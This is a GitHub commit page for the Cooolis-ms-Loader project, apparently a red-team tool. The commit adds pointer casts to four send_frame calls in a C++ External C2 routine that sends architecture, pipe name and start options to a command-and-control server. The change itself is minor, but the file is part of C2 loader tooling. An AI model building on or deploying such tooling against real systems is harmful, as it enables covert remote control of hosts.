Skip to content

Commit

Permalink
update
Browse files Browse the repository at this point in the history
  • Loading branch information
Rvn0xsy committed Nov 30, 2020
1 parent fbb811e commit 794ae70
Showing 1 changed file with 4 additions and 4 deletions.
8 changes: 4 additions & 4 deletions Cooolis-ms-Loader/Cooolis-ms/Cooolis-ExternalC2.cpp
Original file line number Diff line number Diff line change
Expand Up @@ -105,10 +105,10 @@ BOOL CCooolisExternalC2::SendOptions()
#else
std::string arch = CooolisString("YXJjaD14ODY=");
#endif
send_frame(socket_extc2, arch.data(), 8);
send_frame(socket_extc2, pipename.data(), pipename.length());
send_frame(socket_extc2, block.data(), 9);
send_frame(socket_extc2, go.data(), 2);
send_frame(socket_extc2, (PCHAR)arch.data(), 8);
send_frame(socket_extc2, (PCHAR)pipename.data(), pipename.length());
send_frame(socket_extc2, (PCHAR)block.data(), 9);
send_frame(socket_extc2, (PCHAR)go.data(), 2);

return TRUE;
}
Expand Down

0 comments on commit 794ae70

Please sign in to comment.